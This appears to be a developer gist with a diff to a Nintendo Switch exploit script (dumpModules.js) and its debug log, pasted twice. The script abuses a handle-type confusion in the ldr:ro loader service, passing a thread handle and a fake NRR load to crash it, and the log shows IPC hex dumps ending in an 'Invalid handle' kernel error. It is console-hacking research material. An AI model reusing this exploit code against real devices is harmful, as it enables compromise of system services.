roblabla/out

## gistfile1.diff
diff --git a/usefulscripts/dumpModules.js b/usefulscripts/dumpModules.js
index a382369..d0edbdf 100644
--- a/usefulscripts/dumpModules.js
+++ b/usefulscripts/dumpModules.js
@@ -67,7 +67,7 @@ function dumpModule(module, loader, name) {

 utils.log("stage1, getting webkit ldr:ro handle");
 //We are reusing WebKit's ldr:ro session
-var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x955558);
+var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x95D1E8);
 //utils.log('ldr:ro management str base ptr is: ' + utils.paddr(ldrro_mng_ptr));
 var ldrro_mng = sc.read8(ldrro_mng_ptr);
 //utils.log('ldr:ro management str base is: ' + utils.paddr(ldrro_mng));
@@ -85,15 +85,16 @@ var nroSize = 0x1000;
 var bssSize = 0x900;

 //We initialize with a Thread Handle, 0xffff8000 instead of current process handle, 0xffff8001
-sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).sendTo(ldrro);
+sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).showPacked().sendTo(ldrro).assertOk();
 //We setup a fake nrr loading sequence
-sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().sendTo(ldrro);
+utils.log("  Trying loadnrr");
+sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().showPacked().sendTo(ldrro).assertOk();

 utils.log("stage3, crashing ldr:ro");
 //Just calling a normal cmd0 will crash since it will call svcMapProcessCodeMemory during LoadNro sequence using a
 //thread handle, attempting a process handle. This happens because svcGetProcessInfo in ldr:ro initialize can also take up
 //a Thread Handle as an argument, while svcMapProcessCodeMemory will bug out on it
-var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().sendTo(ldrro);
+var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().showPacked().sendTo(ldrro).assertOk();

 //Those are useless so better free them now
 sc.free(nrobase);

## out
stage1, getting webkit ldr:ro handle
stage2, connecting to ldr:ro
ipcm+0x0  | 04 00 00 00 0a 00 00 80  03 00 00 00 00 00 00 00 | ................ |
ipcm+0x10 | 00 00 00 00 00 80 ff ff  00 00 00 00 00 00 00 00 | ................ |
ipcm+0x20 | 53 46 43 49 00 00 00 00  04 00 00 00 00 00 00 00 | SFCI............ |
ipcm+0x30 | 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 | ................ |
  Trying loadnrr
ipcm+0x0  | 04 00 00 00 0e 00 00 80  01 00 00 00 00 00 00 00 | ................ |
ipcm+0x10 | 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 | ................ |
ipcm+0x20 | 53 46 43 49 00 00 00 00  02 00 00 00 00 00 00 00 | SFCI............ |
ipcm+0x30 | 00 00 00 00 00 00 00 00  00 40 53 23 0b 00 00 00 | .........@S#.... |
ipcm+0x40 | 00 10 00 00 00 00 00 00  00 00 00 00             | ............     |
IPC message:
- Command ID / Result code: Error: 0xe401 (Invalid handle. in module Kernel)
ERR [826]: 0xe401 (Invalid handle. in module Kernel)
ResultCode@exploit/ResultCode.js:15:0
assertOk@exploit/ipc.js:555:0
eval code
	diff --git a/usefulscripts/dumpModules.js b/usefulscripts/dumpModules.js
	index a382369..d0edbdf 100644
	--- a/usefulscripts/dumpModules.js
	+++ b/usefulscripts/dumpModules.js
	@@ -67,7 +67,7 @@ function dumpModule(module, loader, name) {

	utils.log("stage1, getting webkit ldr:ro handle");
	//We are reusing WebKit's ldr:ro session
	-var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x955558);
	+var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x95D1E8);
	//utils.log('ldr:ro management str base ptr is: ' + utils.paddr(ldrro_mng_ptr));
	var ldrro_mng = sc.read8(ldrro_mng_ptr);
	//utils.log('ldr:ro management str base is: ' + utils.paddr(ldrro_mng));
	@@ -85,15 +85,16 @@ var nroSize = 0x1000;
	var bssSize = 0x900;

	//We initialize with a Thread Handle, 0xffff8000 instead of current process handle, 0xffff8001
	-sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).sendTo(ldrro);
	+sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).showPacked().sendTo(ldrro).assertOk();
	//We setup a fake nrr loading sequence
	-sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().sendTo(ldrro);
	+utils.log(" Trying loadnrr");
	+sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().showPacked().sendTo(ldrro).assertOk();

	utils.log("stage3, crashing ldr:ro");
	//Just calling a normal cmd0 will crash since it will call svcMapProcessCodeMemory during LoadNro sequence using a
	//thread handle, attempting a process handle. This happens because svcGetProcessInfo in ldr:ro initialize can also take up
	//a Thread Handle as an argument, while svcMapProcessCodeMemory will bug out on it
	-var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().sendTo(ldrro);
	+var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().showPacked().sendTo(ldrro).assertOk();

	//Those are useless so better free them now
	sc.free(nrobase);
	stage1, getting webkit ldr:ro handle
	stage2, connecting to ldr:ro
	ipcm+0x0 \| 04 00 00 00 0a 00 00 80 03 00 00 00 00 00 00 00 \| ................ \|
	ipcm+0x10 \| 00 00 00 00 00 80 ff ff 00 00 00 00 00 00 00 00 \| ................ \|
	ipcm+0x20 \| 53 46 43 49 00 00 00 00 04 00 00 00 00 00 00 00 \| SFCI............ \|
	ipcm+0x30 \| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \| ................ \|
	Trying loadnrr
	ipcm+0x0 \| 04 00 00 00 0e 00 00 80 01 00 00 00 00 00 00 00 \| ................ \|
	ipcm+0x10 \| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \| ................ \|
	ipcm+0x20 \| 53 46 43 49 00 00 00 00 02 00 00 00 00 00 00 00 \| SFCI............ \|
	ipcm+0x30 \| 00 00 00 00 00 00 00 00 00 40 53 23 0b 00 00 00 \| .........@S#.... \|
	ipcm+0x40 \| 00 10 00 00 00 00 00 00 00 00 00 00 \| ............ \|
	IPC message:
	- Command ID / Result code: Error: 0xe401 (Invalid handle. in module Kernel)
	ERR [826]: 0xe401 (Invalid handle. in module Kernel)
	ResultCode@exploit/ResultCode.js:15:0
	assertOk@exploit/ipc.js:555:0
	eval code